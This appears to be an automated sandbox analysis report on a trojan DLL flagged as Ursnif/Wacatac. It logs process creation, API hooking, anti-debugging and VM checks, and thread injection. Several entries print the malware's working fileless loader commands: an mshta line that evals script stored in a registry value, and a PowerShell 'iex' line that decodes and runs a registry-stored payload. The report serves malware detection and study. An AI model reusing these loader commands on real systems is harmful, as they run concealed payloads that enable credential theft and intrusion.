            Source: unknownProcess created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,GrewraceJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,PutJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E2193 push ecx; ret 1_2_6D8E21A3
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E2140 push ecx; ret 1_2_6D8E2149
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8FD3F0 push ecx; mov dword ptr [esp], ecx1_2_6D8FD3F1
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D954477 pushad ; retf 1_2_6D95451E

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2913Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6007Jump to behavior
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe TID: 6596Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,1_2_6D921B50
            Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
            Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D91C480
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D925480 OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__cftoe,__aligned_msize,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__CrtDbgReportWV,1_2_6D925480
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D9211D0 mov ecx, dword ptr fs:[00000030h]1_2_6D9211D0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D914880 mov eax, dword ptr fs:[00000030h]1_2_6D914880
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D921310 mov ecx, dword ptr fs:[00000030h]1_2_6D921310
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D9525FE mov eax, dword ptr fs:[00000030h]1_2_6D9525FE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D952534 mov eax, dword ptr fs:[00000030h]1_2_6D952534
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D95213B push dword ptr fs:[00000030h]1_2_6D95213B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D91C480
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D906930 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D906930
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D906AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6D906AA0

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.csJump to dropped file
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: AE131580Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3292Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D906610 cpuid 1_2_6D906610
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,1_2_6D8E1B13
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
